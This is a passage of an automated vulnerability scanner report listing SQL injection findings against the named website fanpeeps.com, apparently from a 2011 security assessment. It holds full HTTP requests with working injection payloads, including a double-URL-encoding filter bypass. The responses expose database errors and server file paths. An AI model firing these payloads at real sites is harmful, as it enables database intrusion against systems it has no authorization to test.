Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.44. http://fanpeeps.com/media/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media'%20and%201%3d1--%20/?pid= HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17916

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.45. http://fanpeeps.com/media/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17435

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.46. http://fanpeeps.com/media/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0)waitfor%20delay'0%3a0%3a20'--
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.47. http://fanpeeps.com/media/ [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17953

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.48. http://fanpeeps.com/media/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17354

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /media/ HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527%2527; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 53253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.49. http://fanpeeps.com/media/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/?pid= HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17390

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.50. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /media/?pid=&1'=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /media/?pid=&1''=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.51. http://fanpeeps.com/media/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload " was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/?1"=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18157

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.52. http://fanpeeps.com/media/ [pid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload 19058072'%20or%201%3d1--%20 was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /media/?pid=19058072'%20or%201%3d1--%20 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.53. http://fanpeeps.com/mlb [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /mlb

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload " was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /mlb" HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.54. http://fanpeeps.com/ncaa [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/?action=news&pid=19&iid=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17433

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.55. http://fanpeeps.com/ncaa2.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 14003792'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php14003792'%20or%201%3d1--%20 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:24 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18087

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.56. http://fanpeeps.com/ncaa2.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.57. http://fanpeeps.com/ncaa2.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17345

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:10 GMT
